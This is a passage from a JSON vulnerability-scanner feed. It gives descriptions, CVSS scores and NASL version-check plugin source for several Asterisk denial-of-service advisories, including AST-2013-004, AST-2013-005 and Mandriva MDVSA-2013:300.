audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"asterisk-10.12.2-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:59:16", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. \n\nThe application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_005.NASL", "href": "https://www.tenable.com/plugins/nessus/69559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69559);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n\n script_name(english:\"Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. \n\nThe application does not properly handle an invalid SDP in a SIP request\nif such a request defines media descriptions and then defines connection\ndata.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 10.12.3 / 11.5.1 / Certified Asterisk\n1.8.15-cert3 / 11.2-cert2, or apply the appropriate patch listed in the\nAsterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.3\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.23.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert3\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2.x < 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:47", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. The application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "8007.PRM", "href": "https://www.tenable.com/plugins/nnm/8007", "sourceData": "Binary data 8007.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:47", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. The application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "8006.PRM", "href": "https://www.tenable.com/plugins/nnm/8006", "sourceData": "Binary data 8006.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:49", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. \n\nThe application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_004.NASL", "href": "https://www.tenable.com/plugins/nessus/69558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69558);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5641\");\n script_bugtraq_id(62021);\n\n script_name(english:\"Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. \n\nThe application does not properly handle 'ACK' messages with SDP after a\nchannel has been closed.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-21064\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 11.5.1 / Certified Asterisk 1.8.15-cert3\n/ 11.2-cert2, or apply the appropriate patch listed in the Asterisk\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.17.0 to < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n lower_cutoff = \"1.8.17.0\";\n fixed = \"1.8.23.1\";\n if (\n (ver_compare(ver:version, fix:lower_cutoff, app:\"asterisk\") >= 0)\n &&\n (ver_compare(ver:version, fix:fixed, app:\"asterisk\") < 0)\n )\n vulnerable = -1;\n }\n\n # Asterisk Certified 1.8.15-cert3\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T15:02:50", "description": "A vulnerability has been discovered and corrected in asterisk :\n\nBuffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message (CVE-2013-7100).\n\nThe updated packages has been upgraded to the 11.7.0 version which resolves various upstream bugs and is not vulnerable to this issue.", "cvss3": {}, "published": "2013-12-23T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:300)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-gui", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-300.NASL", "href": "https://www.tenable.com/plugins/nessus/71607", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:300. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71607);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7100\");\n script_bugtraq_id(64364);\n script_xref(name:\"MDVSA\", value:\"2013:300\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:300)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in asterisk :\n\nBuffer overflow in the unpacksms16 function in apps/app_sms.c in\nAsterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and\n11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones\nbefore 10.12.4-digiumphones; and Certified Asterisk 1.8.x before\n1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to\ncause a denial of service (daemon crash) via a 16-bit SMS message\n(CVE-2013-7100).\n\nThe updated packages has been upgraded to the 11.7.0 version which\nresolves various upstream bugs and is not vulnerable to this issue.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-11.7.0-summary.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8bcdde9f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22590\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-fax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-festival\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jabber\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-minivm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mobile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mp3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-osp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-oss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-radius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-skinny\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-speex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-tds\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-unistim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64asteriskssl1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / 